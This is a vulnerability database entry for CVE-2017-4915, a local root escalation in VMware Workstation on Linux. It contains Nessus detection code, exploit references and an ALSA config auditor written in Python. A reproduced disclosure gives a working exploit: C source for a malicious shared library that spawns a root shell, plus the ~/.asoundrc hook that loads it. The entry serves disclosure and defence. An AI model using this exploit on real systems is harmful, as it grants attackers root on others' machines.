CVE-2017-4915 - Incorrect Authorization vulnerability in VMWare Workstation Player and Workstation PRO

CVSS 7.2 - HIGH
Attack vector: LOCAL
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: COMPLETE
Integrity impact: COMPLETE
Availability impact: COMPLETE
Tags: local, low complexity, vmware, linux, CWE-863, nessus, exploit available, metasploit

Summary

VMware Workstation Pro/Player contains an insecure library loading vulnerability via ALSA sound driver configuration files. Successful exploitation of this issue may allow unprivileged host users to escalate their privileges to root in a Linux host machine.

Vulnerable Configurations

Part         Description  Count
Application  Vmware       2
OS           Linux        1

Common Weakness Enumeration (CWE)

Exploit-Db

  • id: EDB-ID:47171
    last seen: 2019-07-26
    modified: 2018-12-30
    published: 2018-12-30
    reporter: Exploit-DB
    source: https://www.exploit-db.com/download/47171
    title: VMware Workstation/Player < 12.5.5 - Local Privilege Escalation
  • description: VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation. CVE-2017-4915. Local exploit for Linux platform. Tags: Local
    file: exploits/linux/local/42045.c
    id: EDB-ID:42045
    last seen: 2017-05-22
    modified: 2017-05-22
    platform: linux
    port:
    published: 2017-05-22
    reporter: Exploit-DB
    source: https://www.exploit-db.com/download/42045/
    title: VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation
    type: local

Metasploit

description: This module exploits a vulnerability in VMware Workstation Pro and Player on Linux which allows users to escalate their privileges by using an ALSA configuration file to load and execute a shared object as root when launching a virtual machine with an attached sound card. This module has been tested successfully on VMware Player version 12.5.0 on Debian Linux 8 Jessie.
id: MSF:EXPLOIT/LINUX/LOCAL/VMWARE_ALSA_CONFIG
last seen: 2020-06-10
modified: 2019-11-03
published: 2017-06-18
references:
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/vmware_alsa_config.rb
title: VMware Workstation ALSA Config File Local Privilege Escalation

Nessus

NASL family: General
NASL id: VMWARE_WORKSTATION_LINUX_VMSA_2017_0009.NASL
description: The version of VMware Workstation installed on the remote Linux host is 12.x prior to 12.5.6. It is, therefore, affected by a privilege escalation vulnerability in the ALSA sound driver due to insecurely loading shared libraries via the
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 100417
published: 2017-05-25
reporter: This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/100417
title: VMware Workstation 12.x < 12.5.6 Insecure Library Loading Privilege Escalation (VMSA-2017-0009) (Linux)
code:
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(100417);
  script_version("1.6");
  script_cvs_date("Date: 2018/11/15 20:50:22");

  script_cve_id("CVE-2017-4915");
  script_bugtraq_id(98566);
  script_xref(name:"VMSA", value:"2017-0009");

  script_name(english:"VMware Workstation 12.x < 12.5.6 Insecure Library Loading Privilege Escalation (VMSA-2017-0009) (Linux)");
  script_summary(english:"Checks the VMware Workstation version.");

  script_set_attribute(attribute:"synopsis", value:
"A virtualization application installed on the remote Linux host is
affected by a privilege escalation vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of VMware Workstation installed on the remote Linux host
is 12.x prior to 12.5.6. It is, therefore, affected by a privilege
escalation vulnerability in the ALSA sound driver due to insecurely
loading shared libraries via the '.asoundrc' configuration file. A
local attacker can exploit this, by loading specially crafted
libraries, to gain root privileges on the host.");
  script_set_attribute(attribute:"see_also", value:"https://www.vmware.com/security/advisories/VMSA-2017-0009.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to VMware Workstation version 12.5.6 or later.");
  script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'VMware Workstation ALSA Config File Local Privilege Escalation');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/05/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/25");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:vmware:workstation");
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"General");

  script_copyright(english:"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.");

  script_dependencies("vmware_workstation_linux_installed.nbin");
  script_exclude_keys("SMB/Registry/Enumerated");
  script_require_keys("Host/VMware Workstation/Version", "Settings/ParanoidReport");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if (get_kb_item("SMB/Registry/Enumerated")) audit(AUDIT_OS_NOT, "Linux", "Windows");

version = get_kb_item_or_exit("Host/VMware Workstation/Version");

fix = '';
if (version =~ "^12\.") fix = '12.5.6';

if (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)
{
  report +=
    '\n  Installed version : ' + version +
    '\n  Fixed version     : ' + fix +
    '\n';
  security_report_v4(port:0, extra:report, severity:SECURITY_HOLE);
}
else audit(AUDIT_INST_VER_NOT_VULN, "VMware Workstation", version);

Packetstorm

Seebug

bulletinFamily: exploit
description: This vulnerability permits an unprivileged user on a Linux machine on which VMWare Workstation is installed to gain root privileges. The issue is that, for VMs with audio, the privileged VM host process loads libasound, which parses ALSA configuration files, including one at ~/.asoundrc. libasound is not designed to run in a setuid context and deliberately permits loading arbitrary shared libraries via dlopen().

VMWare Workstation on Linux: unprivileged host user -> host root privesc via ALSA config CVE-2017-4915

To reproduce, run the following commands on a normal Ubuntu desktop machine with VMWare Workstation installed:

```
~$ cd /tmp
/tmp$ cat > evil_vmware_lib.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <err.h>

extern char *program_invocation_short_name;

__attribute__((constructor)) void run(void) {
  if (strcmp(program_invocation_short_name, "vmware-vmx"))
    return;

  uid_t ruid, euid, suid;
  if (getresuid(&ruid, &euid, &suid))
    err(1, "getresuid");
  printf("current UIDs: %d %d %d\n", ruid, euid, suid);
  if (ruid == 0 || euid == 0 || suid == 0) {
    if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
      err(1, "setresxid");
    printf("switched to root UID and GID");
    system("/bin/bash");
    _exit(0);
  }
}
/tmp$ gcc -shared -o evil_vmware_lib.so evil_vmware_lib.c -fPIC -Wall -ldl -std=gnu99
/tmp$ cat > ~/.asoundrc
hook_func.pulse_load_if_running {
  lib "/tmp/evil_vmware_lib.so"
  func "conf_pulse_hook_load_if_running"
}
/tmp$ vmware
```

Next, in the VMWare Workstation UI, open a VM with a virtual sound card and start it. Now, in the terminal, a root shell will appear:

```
/tmp$ vmware
current UIDs: 1000 1000 0
bash: cannot set terminal process group (13205): Inappropriate ioctl for device
bash: no job control in this shell
~/vmware/Debian 8.x 64-bit# id
uid=0(root) gid=0(root) groups=0(root),[...]
~/vmware/Debian 8.x 64-bit#
```

I believe that the ideal way to fix this would be to run all code that doesn't require elevated privileges - like the code for sound card emulation - in an unprivileged process. However, for now, moving only the audio output handling into an unprivileged process might also do the job; I haven't yet checked whether there are more libraries VMWare Workstation loads that permit loading arbitrary libraries into the vmware-vmx process.

Tested with version: 12.5.2 build-4638234, running on Ubuntu 14.04.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Found by: jannh
id: SSV:93133
last seen: 2017-11-19
modified: 2017-05-23
published: 2017-05-23
reporter: Root
title: VMWare Workstation On Linux Privilege Escalation
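
The report above traces the escalation to libasound honoring a `lib` path taken from ~/.asoundrc. As an added example (not part of the original report, the Nessus plugin or any vendor tooling), this Python check audits ALSA configuration text for `lib` directives that resolve outside trusted library directories. The function names, `TRUSTED_LIB_DIRS` and the simplified tokenizer are assumptions, and `SAMPLE` is constructed.

```python
import posixpath
import re

# Assumption: directories treated as trusted library locations on this host.
TRUSTED_LIB_DIRS = ("/usr/lib", "/usr/lib64", "/lib", "/lib64")
PUNCT = set("={}[];,")
_TOKEN = re.compile(  # simplified ALSA tokenizer, not the full libasound grammar
    r'#[^\n]*'                    # comment to end of line (matches no group)
    r'|"((?:\\.|[^"\\])*)"'       # double-quoted string
    r"|'([^']*)'"                 # single-quoted string
    r'''|([^\s=;,{}\[\]#"']+)'''  # bare word
    r'|([={}\[\];,])'             # punctuation
)

def tokens(text):
    """Yield (line_number, token), skipping comments and whitespace."""
    for m in _TOKEN.finditer(text):
        if m.lastindex:  # comments match no capturing group
            yield text.count("\n", 0, m.start()) + 1, m.group(m.lastindex)

def lib_directives(text):
    """Return (line, path) for each `lib` assignment, e.g. `lib "/x.so"` or `a.lib = x.so`."""
    toks = list(tokens(text))
    found = []
    for i, (line, tok) in enumerate(toks):
        if tok == "lib" or tok.endswith(".lib"):
            j = i + 2 if toks[i + 1:i + 2] and toks[i + 1][1] == "=" else i + 1
            if j < len(toks) and toks[j][1] and toks[j][1] not in PUNCT:
                found.append((line, toks[j][1]))
    return found

def is_untrusted(path):
    """True when a `lib` value resolves outside TRUSTED_LIB_DIRS."""
    if "/" not in path:  # bare soname, left to the loader search path (assumption: not flagged)
        return False
    real = posixpath.normpath(path)  # collapses "../"; relative paths never match a trusted dir
    return not any(real.startswith(d + "/") for d in TRUSTED_LIB_DIRS)

def audit(text):
    return [(line, p) for line, p in lib_directives(text) if is_untrusted(p)]

# Constructed sample: one benign entry, the directive from the report, one "../" traversal.
SAMPLE = (
    'hook_func.ok { lib "libasound_module_conf_pulse.so" func "f" }\n'
    'hook_func.pulse_load_if_running {\n  lib "/tmp/evil_vmware_lib.so"\n'
    '  func "conf_pulse_hook_load_if_running"\n}\n'
    'ctl.x.lib = /usr/lib/../../home/user/x.so\n'
)
```

Calling `audit()` on the contents of each user's ~/.asoundrc on hosts running VMware Workstation 12.x prior to 12.5.6 lists the line numbers and paths worth reviewing.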